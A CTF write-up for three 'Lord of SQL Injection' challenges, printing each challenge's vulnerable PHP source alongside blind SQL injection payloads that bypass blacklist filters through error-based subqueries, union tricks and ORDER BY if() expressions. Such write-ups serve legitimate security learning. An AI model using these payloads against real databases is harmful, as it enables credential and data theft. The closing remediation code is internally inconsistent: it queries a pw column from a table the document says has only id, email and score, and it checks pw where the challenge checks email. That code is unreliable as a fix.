Lord of SQL Injection Write-Up (3)

iron_golem

  <?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit(mysqli_error($db));
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");
  highlight_file(__FILE__);

The time-delay functions are filtered. I originally wanted to use a regex-based time-delay injection, but the dot (the wildcard that matches any character in a regex) is filtered as well.

exit(mysqli_error($db));

The program echoes the MySQL error message back, so the usual error-based techniques such as updatexml() come to mind, but the table name is filtered, so that cannot be used.
In the end I used blind injection: when the condition is true, the statement (select 1 union select 2) is executed and raises an error (a scalar subquery that returns more than one row is an error).

When the condition is false, nothing is returned. The blind-injection script is built on this difference.

payload

?pw=1' or id='admin' and if(ascii(substr((pw),1,1))>80,(select 1 union select 2),1)%23

dark_eyes

  <?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);

I originally used this payload:

https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw=1' or id='admin' and substr(pw,1,1)='a' and (select 1 union select 2)%23

But after selecting the table name the page kept coming back blank, so blind injection was not possible this way.

Later, reading other people's write-ups, I found another approach:

select 1 union select 0 raises an error
select 1 union select 1 does not raise an error

A blind injection can be constructed on this basis.

payload

?pw=1' or id='admin' and (select 1 union select ascii(substr((pw),1,1))>80)%23

hell_fire

  <?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("hell_fire");
  highlight_file(__FILE__);

Blind injection through order by.
Depending on whether the if condition is true or false, a different sort key is returned, and the two sort keys must produce different orderings (sorting by score, id or email all return the same order, so a plain numeric value is used instead).

payload

?order=if(id='admin' and ascii(substr(email,1,1))=97,score,9999)
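All three challenges share one root cause: user input is spliced into the SQL string and a blacklist regex is the only defence, which is why the filters above keep being bypassed. As an added example (not code from the LOS challenges), this is how the pw and order queries look with a bound parameter and a column whitelist; it assumes the page's dbconnect() helper and the prob_hell_fire table layout.

```php
<?php
// Added example, not part of the LOS challenge source. Assumes the page's
// dbconnect() helper and the prob_hell_fire table (id, email, score).
include "./config.php";
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // failures throw
$db = dbconnect();

// 1. Value position (iron_golem / dark_eyes): bind the parameter instead of
//    interpolating it. The pw string never becomes SQL text, so quotes,
//    (select 1 union select 2) or if(...) inside it are just characters.
function lookup_pw(mysqli $db, string $pw): ?string {
    $stmt = $db->prepare("select pw from prob_hell_fire where id='admin' and pw=?");
    $stmt->bind_param("s", $pw);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row['pw'] ?? null;
}

// 2. Identifier position (hell_fire): ORDER BY cannot be parameterised, so
//    map the request onto a fixed set of column names instead of filtering
//    with a blacklist. Anything not in the map falls back to id, so an
//    if(...) expression can never reach the query.
const ORDER_COLUMNS = ['id' => 'id', 'email' => 'email', 'score' => 'score'];
function order_column(string $requested): string {
    return ORDER_COLUMNS[$requested] ?? 'id';
}

try {
    $order = order_column($_GET['order'] ?? 'id');
    $rows = $db->query("select id,email,score from prob_hell_fire order by {$order}");
    foreach ($rows as $r) {
        if ($r['id'] === 'admin') $r['email'] = '**************';
        echo htmlspecialchars("{$r['id']} {$r['email']} {$r['score']}"), "<br>";
    }
    $pw = $_GET['pw'] ?? '';
    if ($pw !== '' && lookup_pw($db, $pw) === $pw) solve("hell_fire");
} catch (mysqli_sql_exception $e) {
    // 3. Never echo mysqli_error() to the client: the iron_golem oracle is
    //    built on the error text. Log server-side, answer uniformly.
    error_log($e->getMessage());
    exit("error");
}
```

Binding removes the injection itself; the uniform error response only denies an attacker the extra detail if some other bug remains.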
